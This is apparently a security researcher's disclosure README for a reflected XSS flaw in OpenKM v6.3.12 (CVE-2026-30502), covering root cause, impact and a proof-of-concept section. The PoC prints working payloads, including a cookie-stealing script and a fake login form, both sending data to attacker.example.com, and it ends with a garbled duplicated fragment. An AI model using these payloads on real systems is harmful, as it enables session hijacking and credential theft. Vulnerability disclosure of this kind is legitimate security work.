
Documentation and proof-of-concept for CVE-2026-30502, a reflected XSS vulnerability in OpenKM v6.3.12. Includes technical analysis, root cause, impact assessment, and remediation guidance for security researchers and penetration testers.
Discovered & Reported by Dharmendra Kumar — Security Researcher
Cybersecurity | Penetration Testing | Vulnerability Research | Responsible Disclosure
This repository documents the responsible disclosure of CVE-2026-30502, a Reflected Cross-Site Scripting (XSS) vulnerability identified in OpenKM v6.3.12 — a widely deployed open-source document management system used across enterprise and government environments.
The vulnerability exists in the Content parameter, which reflects user-supplied input back to the browser without proper sanitization or output encoding. An attacker can craft a malicious URL containing embedded JavaScript and social-engineer a victim into clicking it, resulting in script execution within the victim's browser session.
⚠️ Severity: Medium–High | Attack Vector: Network | Privileges Required: None | User Interaction: Required
| Field | Details |
|---|---|
| CVE ID | CVE-2026-30502 |
| Product | OpenKM |
| Affected Version | v6.3.12 |
| Vulnerability Class | Reflected Cross-Site Scripting (XSS) |
| Vulnerable Parameter | Content |
| CWE | CWE-79: Improper Neutralization of Input During Web Page Generation |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N |
| Severity | Medium–High |
| Publisher | MITRE CVE Program |
| Researcher | Dharmendra Kumar |
| Disclosure Type | Responsible / Coordinated |
OpenKM is a free and open-source document management system (DMS) providing a web interface for managing, auditing, and distributing business documents. It is used by enterprises, government bodies, and educational institutions worldwide.
v6.3.12A Reflected Cross-Site Scripting (XSS) vulnerability was identified in OpenKM v6.3.12 via the Content parameter. The application fails to validate or encode user-supplied input before reflecting it back in the HTTP response body, allowing arbitrary JavaScript to be injected and executed in the victim's browser.
Unlike Stored XSS, a Reflected XSS payload is not persisted in the database — instead, it rides within a crafted URL. The attack relies on the victim being tricked into clicking a malicious link (delivered via email, social media, or phishing campaigns), after which the payload executes silently in their browser with the victim's session context.
Attacker crafts malicious URL
│
▼
Victim clicks the link (phishing / social engineering)
│
▼
Browser sends GET/POST request with payload in `Content` parameter
│
▼
OpenKM reflects unsanitized input directly into HTML response
│
▼
Browser parses & executes injected JavaScript
│
▼
Session hijacked / credentials harvested / account compromised
The vulnerability results from the application's failure to enforce input-output security controls on the Content parameter:
| Weakness | Description |
|---|---|
| ❌ No Input Validation | The Content parameter accepts raw HTML/JavaScript characters without restriction or filtering |
| ❌ No Output Encoding | Reflected values are written into the HTML response without HTML-entity encoding |
| ❌ Missing CSP Header | No Content Security Policy is enforced to block inline script execution |
| ❌ No HTTPOnly Cookies | Session tokens are accessible via JavaScript, enabling direct cookie theft |
User-Crafted URL ──► Content Parameter ──► [NO Validation]
──► Reflected in HTML Response ──► [NO Encoding]
──► Browser Executes Script ──► Account Compromised
A successful exploitation of this vulnerability can lead to:
| Risk | Description |
|---|---|
| 🍪 Session Hijacking | Steal active session tokens via document.cookie to impersonate the victim |
| 🔑 Credential Harvesting | Inject fake login overlays to capture plaintext usernames and passwords |
| 📤 Information Disclosure | Exfiltrate sensitive document content, user data, or internal configurations |
| 🎣 Phishing Attacks | Serve convincing fake pages hosted within the trusted OpenKM domain |
| 👤 Account Takeover | Perform arbitrary authenticated actions on behalf of the victim |
| ⚙️ Unauthorized Actions | Modify, delete, or exfiltrate documents within the DMS |
| 🖥️ Malware Distribution | Redirect victims to attacker-controlled sites hosting malicious downloads |
⚠️ Disclaimer: The following information is shared strictly for educational and security research purposes under responsible disclosure principles. Do not test or use this against systems you do not own or have explicit written authorization to assess.
// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>
// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>
// Credential phishing overlay
<script>
var d=document.createElement('div');
d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
+'<input name="u" placeholder="Username"/>'
+'<input name="p" type="password" placeholder="Password"/>'
+'<button>Sign In</button></form>';
document.body.prepend(d);
</script>
https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>
Content parameterContent parameter